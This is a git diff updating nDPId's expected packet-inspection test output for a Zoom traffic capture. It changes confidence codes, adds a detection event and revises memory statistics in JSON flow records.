-01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01362{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","server_names":"*.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Zoom Video Communications, Inc., CN=*.sjc.zoom.us","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"43:42:0A:34:FD:F6:7A:FC:E9:C1:95:D8:E0:79:7E:17:B9:65:B0:A7"}} +01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642965458402,"flow_last_seen":1642965458578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642965458578,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01362{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1642965458402,"flow_last_seen":1642965458752,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":1642965458752,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomsjccv154mmr.sjc.zoom.us","server_names":"*.sjc.zoom.us","ja3":"832952db10f1453442636675bed2702b","ja3s":"8aca82d60194883e764ab2743e60c380","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Zoom Video Communications, Inc., CN=*.sjc.zoom.us","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"43:42:0A:34:FD:F6:7A:FC:E9:C1:95:D8:E0:79:7E:17:B9:65:B0:A7"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965459595,"flow_last_seen":1642965459595,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1642965459595,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1642965459595,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1642965459595,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXeHsAAEARZSPAqAGykMNJmuztImEAgzNnAQADyErEUocYzaK4R3obiZ8zgwAAAAAAAAACAG9hPwBvYT8AAABA5tdm9ZTyTIyTAkYLAufeKJLgneU8bl8DozakMMlr\/JDYAlm5+8RxsTcW0dGDYHnKojsP3MD2C2S9PgF8PPhtdgAAAAAAQABAAAB1MAABAAMAAiAA"} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1642965459696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1642965459696,"pkt":"EBMx8Tl2KDc3AG3ICABFAACXZlQAAEARd0rAqAGykMNJmuztImEAg30SAQADyErEUocYzaK4R3obiZ8zgwAAAAAAAAACAG9hpABvYaQAAABASNx7XNkhaVV2TkWPa7HXWfzTaegL7lyuofS42ADMsef1ZS+nG51oqDil0vt0Fn4zbdXfyiCV8oAbYGEn4LlcKwAAAAAAQABAAAB1MAABAAMAAiAA"} @@ -27,14 +27,14 @@ 00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965460359,"flow_last_seen":1642965461085,"flow_idle_time":200000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":2012,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1642965461085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965500049,"flow_last_seen":1642965500049,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965500049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1642965500049,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1642965500049,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4064AAEABCl\/AqAGykMNJmgMD9zUAAAAARQAAdCt\/QAAxEYFCkMNJmsCoAbIiYeMFAGAAAA=="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965500049,"flow_last_seen":1642965500049,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965500049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.253434} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965500049,"flow_last_seen":1642965500049,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965500049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.253434} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11812,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1642965500053,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1642965500053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA48ZAAAEAB7HzAqAGykMNJmgMD6XYAAAAARQAESyuFQAAxEX1lkMNJmsCoAbIiYeztBDcAAA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11815,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1642965500054,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1642965500054,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4fvIAAEABXxvAqAGykMNJmgMD6XYAAAAARQAESyuHQAAxEX1jkMNJmsCoAbIiYeztBDcAAA=="} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":87,"flow_first_seen":1642965460359,"flow_last_seen":1642965500043,"flow_idle_time":200000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":902,"flow_first_seen":1642965458402,"flow_last_seen":1642965502810,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":107730,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":902,"flow_first_seen":1642965458402,"flow_last_seen":1642965502810,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":107730,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2230,"flow_first_seen":1642965460219,"flow_last_seen":1642965500203,"flow_idle_time":200000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":368542,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8731,"flow_first_seen":1642965459595,"flow_last_seen":1642965500185,"flow_idle_time":200000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1297,"flow_tot_l4_payload_len":7999131,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1642965500049,"flow_last_seen":1642965500203,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":972,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1642965500049,"flow_last_seen":1642965500203,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":972,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","packets-captured":11977,"packets-processed":11977,"total-skipped-flows":0,"total-l4-payload-len":8482462,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":5,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":38,"global_ts_msec":1642965502810} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 11977/11977 @@ -44,9 +44,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6234209 bytes -~~ total memory freed........: 6234209 bytes -~~ total allocations/frees...: 130117/130117 +~~ total memory allocated....: 6367843 bytes +~~ total memory freed........: 6367843 bytes +~~ total allocations/frees...: 132879/132879 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 1367 chars -- cgit v1.2.3